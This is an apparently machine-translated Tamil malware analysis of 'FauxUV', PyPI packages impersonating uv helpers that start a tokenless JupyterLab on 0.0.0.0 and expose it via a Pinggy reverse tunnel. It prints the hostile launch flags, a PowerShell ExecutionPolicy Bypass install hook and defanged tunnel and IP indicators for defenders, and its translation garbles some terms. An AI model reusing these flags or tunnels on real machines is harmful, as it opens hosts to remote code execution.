டிஎல்; DR
PyPI தொகுப்புகளின் ஒரு கொத்து இதன் பெயரைப் பெற்றது uvவேகமான, மிகவும் பிரபலமான ரஸ்ட்-அடிப்படையிலான பைதான் தொகுப்பு மேலாளரை, யுவி ஹெல்பர்ஸ் (uv helpers) போலக் காட்டிக்கொள்ளப் பயன்படுத்துகின்றனர். அவை கிட்டத்தட்ட எந்தவொரு உண்மையான செயல்பாட்டையும் கொண்டிருக்கவில்லை. அதற்குப் பதிலாக, அவை ஒரு விண்டோஸ் பேலோடை (windows payload) கொண்டு வருகின்றன, அது ஒரு... அங்கீகாரம் முடக்கப்பட்ட ஜூபிடர்லேப் சேவையகம் மேலும், பிற்காலப் பதிப்புகளில், அதை ஒரு ரிவர்ஸ் டனல் வழியாகப் பொது இணையத்தில் வெளியிடுகிறது.
முழு கதையும் ஒரே வரியில் இதுதான்: நம்பகமான கருவியின் பெயரைத் தூண்டிலாகவும், ஜூபிடர்லேப்பைத் தொலைநிலைக் குறியீடு செயல்படுத்தும் இயந்திரமாகவும் பயன்படுத்துதல். ஒரு ஜூபிடர் சர்வர், நீங்கள் தட்டச்சு செய்யும் எந்தக் குறியீட்டையும் இயக்கும்.ebook ஒரு வெற்று டோக்கனுடன் தொடங்கப்பட்டு, ஒவ்வொரு நெட்வொர்க் இடைமுகத்துடனும் பிணைக்கப்பட்டுள்ள செல் என்பது, அந்த போர்ட்டை அடையக்கூடிய எவரும் இயக்கக்கூடிய ஒரு திறந்த மொழிபெயர்ப்பியாகும்.
நாங்கள் கிளஸ்டரை இவ்வாறு கண்காணிக்கிறோம்: ஃபாக்ஸ்யுவிஆய்வு செய்யப்பட்ட இரண்டு தொகுப்புகள் பின்வருமாறு: moon-uv (0.0.1-0.0.16) மற்றும் my-magic-uv-helper (0.0.1), அதே இயக்குநரால் வெளியிடப்பட்டு, பகுப்பாய்வின் போது PyPI இல் நேரலையில் இருந்தது.
| சூழல் | PyPI |
| தொகுப்புகள் | moon-uv (0.0.1-0.0.16), my-magic-uv-helper (0.0.1) |
| இலக்கு வைக்கப்பட்ட தளங்கள் | விண்டோஸ் |
| முக்கிய நடத்தை | ரிவர்ஸ் டனல் வழியாக இணையத்தில் வெளியிடப்பட்ட, அங்கீகரிக்கப்படாத ஜூபிடர்லேப் சர்வர். |
| சட்டப்பூர்வமான கருவிகள் தவறாகப் பயன்படுத்தப்பட்டன | யுவி, ஜூபிடர்லேப், கிளவுட்ஃப்ளேர்ட், பிங்கி |
கவர்ச்சி: நீங்கள் ஏற்கனவே நம்பும் ஒரு பெயர்
uv கடந்த இரண்டு ஆண்டுகளில் அதிகம் நிறுவப்பட்ட பைதான் கருவிகளில் ஒன்றாகும், எனவே “இதற்கான ஒரு உதவியாளர் uv"FauxUV" என்பது ஒரு டெவலப்பர் சற்றும் யோசிக்காமல் நிறுவும் ஒரு தொகுப்பாகும். FauxUV தனது நம்பகத்தன்மையை முழுவதுமாக அந்தப் பெயரை வைத்தே பெறுகிறது. இந்தத் தொகுப்புகள் ...ஐ உள்ளடக்குகின்றன. உண்மையான uv ஆஸ்ட்ரலில் இருந்து இன்ஸ்டாலர் — பேலோடில் உள்ள URL-கள் உண்மையான, நம்பகமான ஹோஸ்ட்களைச் சுட்டிக்காட்டுகின்றன — எனவே ஒரு விரைவான பார்வையில் நம்பகமான குறிப்புகளைத் தவிர வேறொன்றும் தெரியாது. தொகுப்புகள் எதுவும் உண்மையில் எதையும் சேர்ப்பதில்லை. uv செயல்பாடு; பெயரே முழு மறைப்பு.
RCE இயந்திரமாக JupyterLab
இந்த பேலோடின் மையப் பகுதி என்பது, அனைத்து பாதுகாப்பு வரம்புகளையும் நீக்கிவிட்டு ஜூபிடர்லேப்பைத் தொடங்கும் ஒரு லாஞ்சர் ஆகும்:
jupyter server --with jupyterlab --ip=0.0.0.0 # listen on every interface --ServerApp.token="" # no password, no token --allow_origin='*' # accept cross-origin connections --disable_check_xsrf # allow a remote browser/WebSocket to drive it ஒவ்வொரு கொடியும் ஒரு பாதுகாப்பை நீக்குகிறது, மேலும் அனுப்பப்பட்ட ஸ்கிரிப்ட் அவற்றை (அசல் சீன மொழியில்) விளக்குகிறது: வெற்று டோக்கன். கடவுச்சொல் மற்றும் டோக்கன் சரிபார்ப்புகளை முடக்குகிறது — யார் வேண்டுமானாலும் இணையலாம். ஜூபிட்டர்லேப் இது ஒரு முறையான தரவு அறிவியல் IDE ஆகும், ஆனால் ஒருebook செல் அதன் வடிவமைப்பின்படி தன்னிச்சையான குறியீட்டை இயக்குகிறது. இவ்வாறு கட்டமைக்கப்பட்டு பிணைக்கப்பட்டுள்ளது. 0.0.0.0அதனால், அது ஒரு IDE ஆகச் செயல்படுவதை நிறுத்தி, ஹோஸ்டில் அங்கீகரிக்கப்படாத ஒரு ரிமோட் ஷெல்லாக மாறிவிடுகிறது — இதற்குத் தனிப்பயன் மால்வேர் பைனரி எதுவும் தேவையில்லை, தவறான திசையில் சுட்டிக்காட்டப்பட்ட ஒரு பிரதான கருவியே போதுமானது.
இரண்டு துணைக்கூறுகள் அதை அடையக்கூடியதாகவும் மீண்டும் செய்யக்கூடியதாகவும் ஆக்குகின்றன:
- அமைதியான நிறுவல் தூண்டல். ஆரம்ப பதிப்புகள் பவர்ஷெல் உடன் இயங்குகின்றன. -எக்ஸிகியூஷன் பாலிசி பைபாஸ் நேராக இருந்து setup.py on குழாய் நிறுவல்பின்னணியில் பிழைகள் அடக்கப்பட்ட நிலையில் பிப் சாதாரணமாகத் தெரிகிறது. பிற்காலப் பதிப்புகள் அதே அடிப்படைக் கூறினை ஒரு இடத்திற்கு நகர்த்துகின்றன. பிப்-யுவி கட்டளை வரி கருவி — மற்றும் நிறுவலின் போது தானாக இயங்குவதை முற்றிலுமாக கைவிடவும்.
- ஒரு பொதுவான தலைகீழ் சுரங்கப்பாதை. ஒரு சேவையகத்தில் 0.0.0.0 இயந்திரத்திற்கு ரூட் செய்யக்கூடிய ஹோஸ்ட்களால் மட்டுமே இன்னமும் அணுக முடியும். ஒரு தொகுக்கப்பட்ட மாட்யூல் ஒரு [பிங்கி](https://pinggy.io/உள்ளூர் Jupyter போர்ட்டை ஒரு பொது முகவரிக்கு அனுப்பி, அந்த வரம்பை நீக்கும் ஒரு SSH ரிவர்ஸ் டனல். அனுப்பப்பட்ட ஸ்கிரிப்ட், Cloudflare-ஐப் பயன்படுத்தும் ஒரு மாற்றுப் பாதையையும் கொண்டுள்ளது — இது கருத்துரைக்கப்பட்டுள்ளது. மேகமூட்டம் மற்றும் ஒரு netsh வெவ்வேறு உள்கட்டமைப்புகள் மூலம் அதே இலக்கை ஆவணப்படுத்தும் வகையில், ஒரு Linode IP-க்கு போர்ட்-ப்ராக்ஸி பயன்படுத்துதல்.
ஒட்டுமொத்தமாக: தொகுப்பை நிறுவியவுடன், ஒரு விண்டோஸ் ஹோஸ்ட் கடவுச்சொல் இல்லாத ஜூபிடர்லேப்பை இயக்கி, அதைத் திறந்த இணையத்தில் வெளியிடுகிறது.
ஃபாக்ஸ் யுவி எப்படி உருவானது
FauxUV-இன் பதிப்புகள் அடுத்தடுத்து விரைவாக வெளியிடப்பட்டன, மேலும் அவற்றுக்கிடையே பேலோடின் தூண்டுதல் புள்ளி நகர்ந்தது — இது, குறியிடப்பட்ட ஒரு பதிப்பு ஒரு தொகுப்பு வரிசையின் முழுமையான கதையை அரிதாகவே சொல்கிறது என்பதை நினைவூட்டுகிறது.
| மேடை | பதிப்புகள் | தூண்டல் | அது சேர்ப்பது |
|---|---|---|---|
| நிறுவல்-கொக்கி | moon-uv 0.0.1–0.0.3, my-magic-uv-helper 0.0.1 | setup.py pip நிறுவலில் | uv நிறுவல் + PATH முன்னொட்டு |
| CLI-இயக்க நேரம் | moon-uv 0.0.5-0.0.13 | pip-uv கட்டளை | கடவுச்சொல் இல்லாத JupyterLab துவக்கி |
| சுரங்கம் | moon-uv 0.0.14-0.0.16 | pip-uv கட்டளை | செயலில் உள்ள பிங்கி ரிவர்ஸ் சுரங்கப்பாதை |
குறிப்பாக, நிறுவலின் போது தானாக இயங்குதல் அகற்றப்பட்டது பிற்கால, அதிகத் திறன் வாய்ந்த பதிப்புகளில் — எனவே, வாழ்க்கைச் சுழற்சியை மட்டுமே அடிப்படையாகக் கொண்ட ஒரு ஸ்கேனர். hooks புதிய வெளியீடுகளுக்கு மதிப்பெண் வழங்குவார் குறைவான ஆபத்தானது, முற்றிலும் தலைகீழானது.
சமரசத்தின் குறிகாட்டிகள்
தொகுப்பின் மூலக் குறியீட்டைப் படிப்பதன் மூலம் உறுதிப்படுத்தப்பட்டது; முனைகள் குறியிடப்பட்டுள்ளன. கருத்து கோப்புகளில் உள்ளன, ஆனால் பகுப்பாய்வு செய்யப்பட்ட பதிப்பால் இயக்கப்படவில்லை. பிணையக் குறிகாட்டிகள் செயலிழக்கச் செய்யப்பட்டுள்ளன.
| வகை | காட்டி |
|---|---|
| புதுப்பிப்பு கட்டளை | powershell -ExecutionPolicy Bypass pip install நேரத்தில், உண்மையான uv இன்ஸ்டாலரைப் பெறுதல் |
| ஜூபிடர்லேப் கொடிகள் | --ip=0.0.0.0 --ServerApp.token="" --allow_origin='*' --disable_check_xsrf |
| தலைகீழ் சுரங்கப்பாதை (செயலில் உள்ளது) | free[.]pinggy[.]io:443 உள்ளூர் அனுப்புதல் 127.0.0.1:8888 |
| சுரங்கப்பாதை ஹோஸ்ட் (கருத்துரைத்தார்) | cloudflared tunnel --url hxxp://127[.]0[.]0[.]1:2718 |
| ஐபி (கருத்துரைக்கப்பட்டது) | 45[.]79[.]134[.]161 (லினோட்) வழியாக netsh port-proxy |
| நிலைத்தன்மையே | வாடிக்கையாளர்களுக்கு %USERPROFILE%\.local\bin பயனர் பாதைக்கு |
இந்தத் துல்லியமான சரங்களைச் சாராமல், எச்சரிக்கை விடுக்கத் தகுந்த நடத்தை சமிக்ஞைகள்: அ குழாய் நிறுவல் அது தோற்றுவிக்கும் powershell -ExecutionPolicy Bypass; ஏதேனும் வியாழன் ஏவுதல் இணைப்புகள் டோக்கன்=”” உடன் –ip=0.0.0.0மற்றும் வெளிச்செல்லும் SSH க்கு *.pinggy.io ஒரு டெவலப்பர் அல்லது CI இயந்திரத்திலிருந்து.
கவனிக்கப்பட்ட நடத்தை மற்றும் தோற்றம்
இந்த இரண்டு தொகுப்புகளும் ஒரு பொதுவான உருவாக்குநரையும் ஒரு பொதுவான வழிமுறையையும் கொண்டுள்ளன: ஒரு நம்பகமான கருவியின் பெயர், விண்டோஸிற்கு மட்டுமேயான கட்டுப்பாடு, பிழை அடக்கப்பட்ட பின்னணிச் செயலாக்கம், மற்றும் புகழ்பெற்ற கருவிகளைச் சார்ந்திருத்தல் ஆகியவை இதில் அடங்கும். இதனால், ஒரு விரைவான பார்வையில் புகழ்பெற்ற URL-கள் மட்டுமே தென்படும். மூலக் கோப்பானது, பாதுகாப்பு தொடர்பான குறியீடுகளைத் தெளிவாக விவரிக்கும் சீன மொழி விளக்கங்களைக் கொண்டுள்ளது; அவற்றை நாங்கள் ஒரு உள்நோக்கம் குறித்த கூற்றாக அல்லாமல், கோப்பில் காணக்கூடிய கூற்றுகளாகவே தெரிவிக்கிறோம். தோற்றத்தை அனுமதி மதிப்பு மற்றும் ஒரு கோலாப்.பேட் கூகிள் கோலாபில் புழக்கத்தில் உள்ள முறைசாரா “எனது உள்ளூர் இயக்க நேரத்தைப் பகிர்தல்” பணிப்பாய்வுகளை filename எதிரொலிக்கிறது. அதன் மூலம் எதுவாக இருந்தாலும், தொகுக்கப்பட்ட முடிவு ஒன்றாகவே இருக்கும்.
பாதுகாவலர்களுக்கான தாக்கம் மற்றும் வழிகாட்டுதல்
போலி புற ஊதாக் கதிர்களுக்கு யார் ஆளாகிறார்கள்? விண்டோஸ் டெவலப்பர்கள் மற்றும் சிஐ ரன்னர்கள் குழாய் நிறுவல் இந்தத் தொகுப்புகளில் ஒன்று. கடவுச்சொல் இல்லாத JupyterLab இல் 0.0.0.0 போர்ட்டை அணுகக்கூடிய எவருக்கும் இது தொலைநிலை குறியீடு செயலாக்கமாகும்; இந்த டனல், “யார் அதை அணுகலாம்” என்ற வரம்பை நீக்குகிறது. சர்வர், நிறுவும் பயனராக இயங்கி, அந்தப் பயனரின் கோப்புகள், டோக்கன்கள் மற்றும் கிளவுட் நற்சான்றுகளைப் பெற்றுக்கொள்கிறது.
ஏன் இதைத் தவறவிடுவது எளிது. ஒவ்வொரு நெட்வொர்க் ஸ்டிரிங்கும் ஒரு நம்பகமான ஹோஸ்டை சுட்டிக்காட்டுகிறது — ஆஸ்ட்ரல், ஜூபிடர்லேப், மேகமூட்டம்பிங்கி, கோலாப். ஹேஷ் செய்வதற்கு தீம்பொருள் பைனரியும் இல்லை, டிகோட் செய்வதற்கு மறைக்கப்பட்ட பிளாப்பும் இல்லை. நற்பெயர் மற்றும் கையொப்பம் அடிப்படையிலான ஸ்கேனிங் ஆகிய இரண்டுமே இதற்கு குறைவான முக்கியத்துவம் அளிக்கின்றன, இதனால்தான் நடத்தை சார்ந்த கேள்வி எழுகிறது — இந்தத் தொகுப்பை நிறுவுவதால் கணினி என்ன செய்யும்? — தான் அதைப் பிடிக்கிறது.
வழிகாட்டல்:
- எந்தவொரு நிறுவல் நேர சிகிச்சையையும் powershell -ExecutionPolicy Bypass அது எந்த URL-ஐப் பெற்றாலும், அது கட்டமைப்பை முடக்கும் ஒரு சமிக்ஞையாகச் செயல்படும்.
- எச்சரிக்கை வியாழன் வெற்று டோக்கனுடன் தொடங்கப்பட்டது மற்றும் –ip=0.0.0.0அந்தக் கலவை ஒரு பணிநிலையத்திலோ அல்லது ரன்னரிலோ ஒருபோதும் தோன்றக்கூடாது.
- டனல் வழங்குநர்களுக்கான வெளிச்செல்லும் SSH-ஐக் கண்காணிக்கவும் (*.pinggy.io, *.trycloudflare.comடெவலப்பர் மற்றும் CI சூழல்களில் இருந்து.
- நிறுவ uv [அதன் அதிகாரப்பூர்வ மூலத்திலிருந்து](https://docs.astral.sh/uv/மேலும், நிறுவுவதற்கு ஏற்கெனவே மிகவும் எளிதான ஒரு கருவியை உள்ளடக்கிய மூன்றாம் தரப்பு “உதவி” தொகுப்புகள் குறித்தும் சந்தேகம் கொள்ளுங்கள்.
- மேம்படுத்தலின் போது சார்புநிலைகளை நிலைநிறுத்தி மீண்டும் மதிப்பாய்வு செய்யவும் — ஒரு தொகுப்பு வரிசையானது பதிப்பிற்குப் பதிப்பு புதிய திறனை வளர்த்துக் கொள்ள முடியும்.



